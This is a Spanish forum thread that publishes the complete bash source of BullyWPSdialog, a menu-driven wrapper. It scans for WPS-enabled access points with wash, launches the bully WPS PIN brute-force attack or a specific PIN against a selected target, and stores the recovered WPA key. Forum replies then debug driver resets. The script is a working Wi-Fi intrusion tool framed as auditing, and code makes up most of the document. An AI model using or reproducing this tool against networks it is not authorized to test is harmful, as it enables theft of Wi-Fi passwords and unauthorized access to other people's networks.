#   un ataque introduciendo un PIN especifico.
# - Solucionado un error ortográfico.
#
# VERSION 0.8.1  26/09/2013
# -----------------------
# - Mejorada la función de detectar driver para identificar correctamnete
#   el driver WiLink.
# - Añadido un sleep después de desmonta el driver y otro después de volver
#   a montarlo, para evitar problemas con el driver ath9k.



# Variables globales
SCRIPT="BullyWPSdialog"
VERSION="0.8.1 Beta"
BACKTITLE="$SCRIPT $VERSION - By geminis_demon - SeguridadWireless.Net"
TMP="/tmp/$SCRIPT"
KEYS="$HOME/swireless/$SCRIPT/Keys"

# Función que obtiene PIN y clave WPA del log de bully
obtener_clave_wpa() {

# En caso de que el retun de bully no sea 0, de da por echo que no se ha obtenido la clave
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]').run"|grep "signal 0$")" ]; then

# Se parsea el log de bully para obtener el PIN y la clave WPA
WPS_PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]').run"|tr ':' ' '|awk '{print $4}')"

# Si el BSSID objetivo cumple con el CheckSum,
# este se calcula para saber cual es el último dígito del PIN
# (ya podría venir el PIN completo en el log de bully ¬¬)
if [ ! "$NO_CHECKSUM" ]; then
WPS_PIN=$(echo $WPS_PIN|cut -b 1,2,3,4,5,6,7)
pin=$WPS_PIN
wps_pin_checksum
WPS_PIN=$WPS_PIN$PIN_p2
fi
else
WPS_PIN=""
CLAVE_WPA=""
fi

}

# Función que desmonta y vuelve a montar el driver de la interface seleccionada
reset_iface() {

if [ "$INTERFACE" ]; then

# Identificamos el driver de la interface seleccionada
DRIVER="$(basename "$(ls -l "/sys/class/net/$INTERFACE/device/driver")")"
if [ ! "$DRIVER" ] && [ -d "/sys/class/net/tiwlan0/wireless" ]; then
DRIVER="WiLink"
fi

# Se desmonta y se vuelve a montar el driver
rmmod -f "$DRIVER" >/dev/null 2>&1
sleep 1
modprobe "$DRIVER" >/dev/null 2>&1
sleep 1

# Se pone la interface "up" para evitar problemas
# con algunos adaptadores inalámbricos
ifconfig "$INTERFACE" up >/dev/null 2>&1
fi

}

# Función comprobar si la interface está asociada a un punto de acceso
comprobacion_interface_asociada() {

# Si la interface está asociada, no se puede continuar
if [ ! "$(iwconfig $INTERFACE|grep "Not-Associated")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " NO SE PUEDE CONTINUAR " \
      --ok-label "Salir" \
      --msgbox "\nPara evitar errores, la interface $INTERFACE \
               no debe estar asociada a un punto de acceso.\n " 0 0
exit 1
fi
}

# Función salvar clave WPA
salvar_clave_wpa() {

# Si no se ha obtenido la clave WPA, informamos de ello y volvemos al menú
if [ ! "$CLAVE_WPA" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " PROCESO COMPLETADO " \
      --ok-label "Volver al menú" \
      --msgbox "\nNo ha sido posible obtener la clave WPA\n " 0 0
     
# Si dialog no devuelve el valor 0, salimos
if [ $? != 0 ]; then
reset_iface; exit 1
fi

menu --InfoAP
fi

# Si existe la ruta $KEYS y no es un directorio se elimina
if [ -e "$KEYS" ] && [ ! -d "$KEYS" ]; then rm -rf "$KEYS"; fi

# Si no existe la ruta $KEYS la creamos
if [ ! -d "$KEYS" ]; then mkdir -p "$KEYS"; fi

# Salvamos la clave en un archivo de texto
NOMBRE="$ESSID_$(echo "$BSSID"|tr ':' '-')"
cat << EOF >"$TMP/$NOMBRE.key"
    ESSID: $ESSID
    BSSID: $BSSID
  PIN WPS: $WPS_PIN
CLAVE WPA: $CLAVE_WPA
EOF

# Convertimos el texto a formato windows
cat "$TMP/$NOMBRE.key"|sed -e 's/$/\r/' >"$KEYS/$NOMBRE.txt"

# Diálogo que informa donde se ha guardado la clave WPA
dialog --backtitle "$BACKTITLE" \
       --title " PROCESO COMPLETADO " \
       --ok-label "Volver al menú" \
       --msgbox "\n¡Se han obtenido con exito clave WPA! \
                \nLa clave ha sido guardada en: \n\n$KEYS/$NOMBRE.txt" 0 0

# Saltamos al menú principal
menu --InfoAP --InfoWPA
}

# Función lanzar ataque de fuerza bruta con bully
bully_wps() {

# Se comprueba que la interface no esté asociada
comprobacion_interface_asociada

# Si no se ha seleccionado ningún objetivo no se puede continuar
if [ ! "$ESSID" -o ! "$BSSID" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " NO SE PUEDE CONTINUAR " \
      --ok-label "Volver al menú" \
      --msgbox "\nNo se ha seleccionado ningún objetivo\n " 0 0
menu
fi

# Si el BSSID corresponde con 8C:0C:A3, el PIN no cumple con el CheckSum
if [ "$(echo "$BSSID"|cut -d':' -f1,2,3)" = "8C:0C:A3" ]; then
NO_CHECKSUM="-B"
LONGITUD_PIN="8"
else
NO_CHECKSUM=""
LONGITUD_PIN="7"
fi

# Si se ha elejido la opción de introducir PIN manualmente, mostramos el diálogo para introducir el pin
if [ "$1" = "--Pin" -o "$2" = "--Pin" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " INTRODUCIR PIN MANUALMENTE " \
      --cancel-label "Volver al menú" \
      --max-input "$LONGITUD_PIN" \
      --inputbox "\nIn troduce el PIN con un máximo de $LONGITUD_PIN dígitos:" 0 0 \
2>"$TMP/PIN_WPS.txt"

# Si el comando anterior no devuelve el valor 0, volvemos al menú
if [ ! $? = 0 ]; then menu; fi

# Si no se intruduce un valor numérico, no se puede continuar
if [ ! "$(cat "$TMP/PIN_WPS.txt"|grep "^[0-9]*$")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " ERROR " \
      --msgbox "\nDebes introducir un valor numérico\n " 0 0
bully_wps --InfoAP --Pin
fi

# Guardamos en una variable el PIN junto con los parámetros para bully
PIN_WPS="-S -p $(cat "$TMP/PIN_WPS.txt")"
else
PIN_WPS=""
fi

# Lanzamos ataque con bully
xterm  -hold -fg FloralWhite -bg DarkBlue -T "Bully -> $ESSID" -e \
bully -F -b $BSSID -c $CANAL -v 3 $PIN_WPS $NO_CHECKSUM -N $INTERFACE_MON & BULLY_PID=$!

# Diálogo que aparecerá mientras se ejecuta el ataque
dialog --backtitle "$BACKTITLE" \
       --infobox "$INFO_AP\nSe ha puesto en marcha el ataque con bully,
                 presiona \"Control+C\" para detener el proceso.\n " 16 49
      
# Si se presiona "Control+C", se detiene el proceso de bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT

# Mientras el proceso de bully esté activo, el script estrá "durmiendo"
while [ -e "/proc/$BULLY_PID" ]; do
sleep 2
done

# Obtenemos el PIN y clave WPA
obtener_clave_wpa

# Salvamos PIN y clave en un archivo
salvar_clave_wpa

}

# Función seleccionar objetivo
seleccionar_objetivo() {

# Si no se encuentran objetivos, no se puede continuar
if [ ! "$(cat "$TMP/wash_scan.txt")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " NO SE PUEDE CONTINUAR " \
      --ok-label "Volver al menú" \
      --msgbox "\nNo se ha encontrado ningún objetivo con WPS activado.\n " 0 0
menu
fi

# Creamos el menú para seleccionar objetivo
N=1
cat "$TMP/wash_scan.txt"|while read MAC CANAL PWR VER LOCK ESSID; do
if [ "$LOCK" = "Yes" ]; then LOCK="Si"; fi
echo "\"$N)\" \"$MAC    $LOCK       $CANAL     $(($PWR+100))    $ESSID\" \\"
N=$(($N+1))
done >"$TMP/menu_objetivos.txt"

# Diálogo para seleccionar objetivo
dialog --backtitle "$BACKTITLE" \
       --title " SELECCIONAR OBJETIVO " \
       --cancel-label "Volver al menú" \
       --menu "\n              BSSID        Locked   Canal   PWR    ESSID" 0 0 0 \
       --file "$TMP/menu_objetivos.txt" \
2>"$TMP/seleccion.txt"

# Si el comando anterior no devuelve el valor 0, volvemos al menú
if [ ! $? = 0 ]; then menu; fi

# Definimos los parámetros que se le pasarán a bully
SELECCION=$(cat "$TMP/seleccion.txt")
ESSID="$(cat "$TMP/menu_objetivos.txt"|tr -d '"'|tr -d '\\'|grep "^$SELECCION"|cut -d' ' -f22-)"
BSSID="$(cat "$TMP/menu_objetivos.txt"|tr -d '"'|tr -d '\\'|grep "^$SELECCION"|awk '{print $2}')"
CANAL="$(cat "$TMP/menu_objetivos.txt"|tr -d '"'|tr -d '\\'|grep "^$SELECCION"|awk '{print $4}')"

# Comprobamos si la clave ya ha sido obtenida anteriormente
if [ -e "$KEYS/$(echo "$BSSID"|tr ':' '-').txt" ]; then
WPS_PIN="$(cat "$KEYS/$(echo "$BSSID"|tr ':' '-').txt"|grep "PIN WPS:"|awk '{print $3}')"
CLAVE_WPA="$(cat "$KEYS/$(echo "$BSSID"|tr ':' '-').txt"|grep "CLAVE WPA:"|awk '{print $3}')"
else
obtener_clave_wpa
fi

# Si la clave ya ha diso obtenida anteriormente, la mostramos en el menú,
# en caso contrario mostramos solo la información básica
if [ "$CLAVE_WPA" ]; then
menu --InfoAP --InfoWPA
else
menu --InfoAP
fi
}

# Función escanear con wash en busca de objetivos con WPS activado
escanear_wps() {

# Se comprueba que la interface no esté asociada
comprobacion_interface_asociada

# Diálogo para introducir tiempo a escanear
dialog --backtitle "$BACKTITLE" \
       --title " ESCANEAR EN BUSCA DE OBJETIVOS " \
       --cancel-label "Volver al menú" \
       --max-input "2" \
       --inputbox "\nIntroduce el tiempo a escanear en segundos: \n " 0 0 \
2>"$TMP/segundos.txt"

# Si el comando anterior no devuelve el valor 0, volvemos al menú
if [ ! $? = 0 ]; then menu; fi

# Si no se introduce un valor numérico, no se puede continuar
if [ ! "$(cat "$TMP/segundos.txt"|grep "^[0-9]*$")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " ERROR " \
      --msgbox "\nDebes introducir un valor numérico\n " 0 0
escanear_wps
fi

# Matámos proceso de wash para evitar conflictos
killall wash >/dev/null 2>&1

# Escaneamos con wash
wash -i $INTERFACE_MON -C -D 2>/dev/null|tail -n +3|grep -v "^$" >"$TMP/wash_scan.txt" &

# Diálogo que muestra barra de progreso mientras se escanea
N2=$(cat "$TMP/segundos.txt")
N1=1
while [ ! $(($N1-1)) -eq $N2 ]; do
PORCENT=$(($(($N1*100))/$N2))
echo $PORCENT
sleep 1
N1=$(($N1+1))
done|\
dialog --backtitle "$BACKTITLE" \
       --title " ESCANEANDO EN BUSCA DE OBJETIVOS " \
       --gauge "" 0 0 \
2>/dev/null

# Cuando pasa el tiempo programado, terminamos el rpoceso de wash
killall wash >/dev/null 2>&1
sleep 1

# Saltamos a la funcion seleccionar objetivo
seleccionar_objetivo
}

# Función seleccionar interface y poner en modo monitor
seleccionar_interface() {

# Si no se encuentra ninguna tarjeta wifi, no se puede continuar
if [ ! "$(iwconfig 2>/dev/null|cut -d' ' -f1|grep -v "^$")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " NO SE PUEDE CONTINUAR " \
               --ok-label "Salir" \
               --msgbox "\nNo se ha detectado ninguna tarjeta wifi en este equipo.\n " 0 0
exit 1
fi

# Creamos el menú para seleccionar la interface
N=1
airmon-ng 2>/dev/null|egrep -v "^Interface|^$"|cut -d'-' -f1|\
while read INTERFACE CHIPSET MODELO DRIVER; do
if [ "$(iwconfig 2>/dev/null|grep "^$INTERFACE"|grep -v "Mode:Monitor")" ]; then
echo "\"$N\" \"$INTERFACE       $CHIPSET $MODELO      $DRIVER\" \\"
N=$(($N+1))
fi
done >"$TMP/menu_interfaces.txt"

# Diálogo para seleccionar interface
dialog --backtitle "$BACKTITLE" \
       --title " SELECCIONAR INTERFACE " \
       --cancel-label "Salir" \
       --menu "\n       Interface   Chipset            Driver" 0 0 0 \
       --file "$TMP/menu_interfaces.txt" \
2>"$TMP/seleccion.txt"

# Si dialog no devuelve el valor 0, salimos.
if [ ! $? = 0 ]; then exit 1; fi

SELECCION="$(cat "$TMP/seleccion.txt")"
INTERFACE="$(cat "$TMP/menu_interfaces.txt"|tr -d '"'|tr -d '\\'|grep ^$SELECCION|awk '{print $2}')"

# Se comprueba que la interface no esté asociada
comprobacion_interface_asociada

# Se reinicia el driver de la interface seleccionada para evitar conflictos
reset_iface

# Ponemos la interface seleccionada en modo monitor
airmon-ng start $INTERFACE >"$TMP/log_airmon-ng.txt" 2>&1

# Si hay algún error al poner la interface en modo monitor no se puede continuar
if [ ! $? = 0 ]; then
dialog --backtitle "$BACKTITLE" \
               --title " ERROR " \
               --ok-label "Salir" \
               --textbox "$TMP/log_airmon-ng.txt" 0 0
        reset_iface; exit 1
fi

# Definimos interface en modo monitor
INTERFACE_MON="$(cat "$TMP/log_airmon-ng.txt"|grep "monitor mode enabled"|tr -d ')'|awk '{print $5}')"

dialog --backtitle "$BACKTITLE" \
       --infobox "\nSe utilizará $INTERFACE_MON en modo monitor\n " 0 0
sleep 3

# Saltámos al menú principal
menu
}

# Yeah Niroz was here, computePIN by ZaoChunsheng, C portado a bash
wps_pin_checksum() {
  acum=0
  PIN_p2=0

  while [ $pin -gt 0 ]; do
    acum=$(($acum + (3 * ($pin % 10))))
    pin=$(($pin / 10))
    acum=$(($acum + ($pin % 10)))
    pin=$(($pin / 10))
  done

  result=$(((10 - ($acum % 10)) % 10))
  PIN_p2=$(($result % 10000000))
}

# Función menú principal
menu() {

# Información del objetivo
INFO_AP="
$(if [ "$1" = "--InfoAP" ]; then
echo "\n\n        INFORMACIÓN DEL OBJETIVO\n"
echo "   ************************************  \n"
echo "      ESSID: $ESSID\n"
echo "      BSSID: $BSSID\n"
echo "      Canál: $CANAL\n"
if [ "$2" = "--InfoWPA" ]; then
echo "    PIN WPS: $WPS_PIN\n"
echo "  Clave WPA: $CLAVE_WPA\n"
echo "   ************************************  \n\n"
else
echo "   ************************************  \n\n"
fi
fi)"

# Diálogo con opciones del menú principal
dialog --backtitle "$BACKTITLE" \
       --title " MENU PRINCIPAL " \
       --cancel-label "Salir" \
       --menu "$INFO_AP\nSelecciona una opción:" 0 0 0 \
     "1)" "Escanear en busca de objetivos" \
     "2)" "Comenzar ataque de fuerza bruta" \
     "3)" "Probar un PIN específico" \
     "4)" "Seleccionar otro objetivo" \
2>"$TMP/seleccion.txt"

# Si dialog no devuelve el valor 0, salimos
if [ ! $? = 0 ]; then reset_iface; exit 1; fi

# Dependiendo de la opción elegida, se llama a la función correspondiente
case $(cat "$TMP/seleccion.txt"|tr -d ')') in
1 ) escanear_wps;;
2 ) bully_wps --InfoAP;;
3 ) bully_wps --InfoAP --Pin;;
4 ) seleccionar_objetivo;;
esac
}

# Si existe la ruta $TMP y no es un directorio se elimina
if [ -e "$TMP" ] && [ ! -d "$TMP" ]; then rm -rf "$TMP"; fi

# Si no existe la ruta $TMP la creamos
if [ ! -d "$TMP" ]; then mkdir -p "$TMP"; fi

# Comienza el script seleccionando la interface
seleccionar_interface

« Última modificación: 26-09-2013, 11:01 (Jueves) por geminis_demon »

La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 14715
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #56 en: 26-09-2013, 11:02 (Jueves) »
pruebo y te digo ...

TODO OK

PERFECT  ;D


Espero que ahora ya si , ...lo que ha dado de si un simple "sleep" ...  :'(
« Última modificación: 26-09-2013, 11:05 (Jueves) por USUARIONUEVO »

alist3r

  • Visitante
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #57 en: 26-09-2013, 11:20 (Jueves) »
Bien , ... pues resulta que estamos IGUAL O PEOR que antes.


Cuando el driver es ath9k_htc , hay que resetear 2


ath9k & ath9k_htc


me di cuenta de que no estaba funcionando por que el numero de interfaces monitor no para de aumentar y cuando tumbamos el driver se supone que caen todas ...y no es asi , por lo que el driver no se esta desmontando.  :'(


Al final veras tu , que lo mas comodo el el down/up y a correr.

de veras? entonces se confirman mis temores xDDDD
no pasa nada. podemos hardcodear todos los casos que hagan falta, es sumamente sencillo.
una estructura de control CASE/ESAC y arreando. no supone problema alguno.

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 14715
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #58 en: 26-09-2013, 11:34 (Jueves) »
Bien , ... pues resulta que estamos IGUAL O PEOR que antes.


Cuando el driver es ath9k_htc , hay que resetear 2


ath9k & ath9k_htc


me di cuenta de que no estaba funcionando por que el numero de interfaces monitor no para de aumentar y cuando tumbamos el driver se supone que caen todas ...y no es asi , por lo que el driver no se esta desmontando.  :'(


Al final veras tu , que lo mas comodo el el down/up y a correr.

de veras? entonces se confirman mis temores xDDDD
no pasa nada. podemos hardcodear todos los casos que hagan falta, es sumamente sencillo.
una estructura de control CASE/ESAC y arreando. no supone problema alguno.

ya esta arreglado alist3r , solo necesitaba un sleep ...entre el remotanje de driver y el airmon-ng start ...si noi cuando airmon buscaba la interface estaba desaparecida por que aun no habia levantado el driver , y de hay fallaba todo.

Desconectado geminis_demon

  • Colaborador
  • *
  • Mensajes: 2377
  • Prácticas precisas precisan práctica
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #59 en: 26-09-2013, 11:37 (Jueves) »
pruebo y te digo ...

TODO OK

PERFECT  ;D


Espero que ahora ya si , ...lo que ha dado de si un simple "sleep" ...  :'(

jejeje.. a veces la solución es tan sencilla que damos por echo que no puede ser tan fácil, y nos complicamos la vida buscando otra solución mas compleja, a mi me suele pasar eso  >:D

Bueno pues ya está, tema arreglado, lo pongo en el post principal  >:(

La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.

//FINAL Y MÁS DOS RESPUESTAS